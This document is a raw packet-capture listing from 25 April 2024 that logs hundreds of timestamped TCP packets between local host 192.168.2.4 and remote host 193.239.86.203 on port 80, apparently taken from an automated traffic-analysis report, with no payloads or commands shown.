                        Apr 25, 2024 21:36:48.375266075 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.375323057 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.375387907 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.375387907 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.375432014 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.375441074 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.375472069 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.375606060 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.375663996 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.375700951 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.375736952 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.375756025 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.375786066 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.375794888 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.375850916 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.375850916 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.375885963 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.375911951 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.375931025 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.375938892 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.375956059 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.375994921 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.376086950 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.376112938 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.376144886 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.376176119 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.376219034 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.376255989 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.376276970 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.376297951 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.376307011 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.376342058 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.376353025 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.376384974 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.376418114 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.376466990 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.376507044 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.376549959 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.376601934 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.376627922 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.376660109 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.376688004 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.376770973 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.376828909 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.376854897 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.376913071 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.376913071 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.376962900 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.376982927 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.377002001 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.377042055 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.377064943 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.377077103 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.377095938 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.377135992 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.377146959 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.377196074 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.377196074 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.377207994 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.377243996 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.377266884 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.377296925 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.377305984 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.377357960 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.377360106 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.377403021 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.377424955 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.377481937 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.377516985 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.377532959 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.377563953 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.684010029 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.684062004 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.684092045 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.684124947 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.684139967 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.684402943 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.684446096 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.684463978 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.684484959 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.684504986 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.684540987 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.684562922 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.684602022 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.684618950 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.684673071 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.684691906 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.684731007 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.684737921 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.684770107 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.684778929 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.684809923 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.684815884 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.684848070 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.684861898 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.684889078 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.684895992 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.684936047 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.684947968 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.684978008 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.684988976 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685014963 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685025930 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685054064 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685060024 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685094118 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685110092 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685129881 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685148001 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685168982 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685206890 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685225964 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685240984 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685255051 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685281038 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685328960 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685339928 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685378075 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685395002 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685426950 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685431004 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685471058 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685484886 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685509920 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685525894 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685549974 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685560942 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685587883 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685601950 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685621977 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685638905 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685682058 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685724974 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685741901 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685765982 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685780048 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685812950 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685843945 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685882092 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685898066 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685920954 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685934067 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685956001 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.685977936 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.685993910 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686031103 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686039925 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686069965 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686081886 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686109066 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686124086 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686147928 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686155081 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686187983 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686203003 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686222076 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686244965 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686259985 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686297894 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686311960 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686336994 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686348915 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686374903 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686383009 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686412096 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686427116 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686453104 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686465979 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686494112 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686500072 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686532974 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686547995 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686575890 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686594009 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686619043 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686657906 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686670065 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686691999 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686709881 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686764002 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686803102 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686815977 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686841011 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686850071 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686880112 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686897039 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686919928 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.686930895 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.686970949 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.687025070 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.687063932 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.687082052 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.687102079 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.687114954 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.687155008 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.687304020 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.687361956 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.687720060 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.687757969 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.687783957 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.687802076 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.688075066 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.688134909 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.688153028 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.688191891 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.688210011 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.688242912 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.688262939 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.689347982 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.689387083 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.689419985 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.689419985 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.689446926 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.690592051 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.690644026 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.690707922 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.690747976 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.690764904 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.690788031 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.690800905 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.690828085 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.690844059 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.690865993 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.690881014 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.690903902 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.690920115 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.690944910 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.690960884 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.690984964 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.690998077 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691025019 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691031933 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691063881 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691078901 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691102982 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691122055 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691142082 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691154957 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691181898 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691190004 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691215992 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691234112 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691255093 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691293955 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691302061 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691330910 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691346884 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691370010 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691382885 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691409111 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691417933 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691456079 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691462040 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691492081 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691514969 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691530943 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691535950 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691569090 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691581011 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691608906 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691628933 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691648006 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691683054 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691721916 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691744089 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691760063 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691765070 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691798925 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691821098 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691837072 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691850901 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691870928 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691905975 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.691909075 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691950083 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.691987991 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692001104 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692022085 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692025900 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692044020 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692065954 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692121029 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692127943 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692127943 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692161083 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692198992 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692207098 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692226887 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692234039 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692270041 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692276001 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692308903 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692344904 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692353010 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692373991 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692384005 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692420959 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692428112 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692428112 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692459106 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692466974 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692497969 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692502975 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692537069 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692548990 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692574978 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692584991 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692614079 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692631960 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692652941 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692667007 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692692041 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692708969 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692733049 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692744017 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692770004 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692780018 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692805052 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692819118 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692842007 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692878962 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692888021 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692918062 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692933083 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692958117 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.692970991 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.692996025 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.693008900 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.693033934 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.693047047 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.693072081 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.693087101 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.693110943 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.693125963 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.693150997 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.693161011 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.693187952 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.693203926 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.693221092 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.693240881 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.995452881 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.995498896 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.995537043 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.995569944 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.995589972 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.995611906 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.995628119 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.995657921 CEST4973580192.168.2.4193.239.86.203
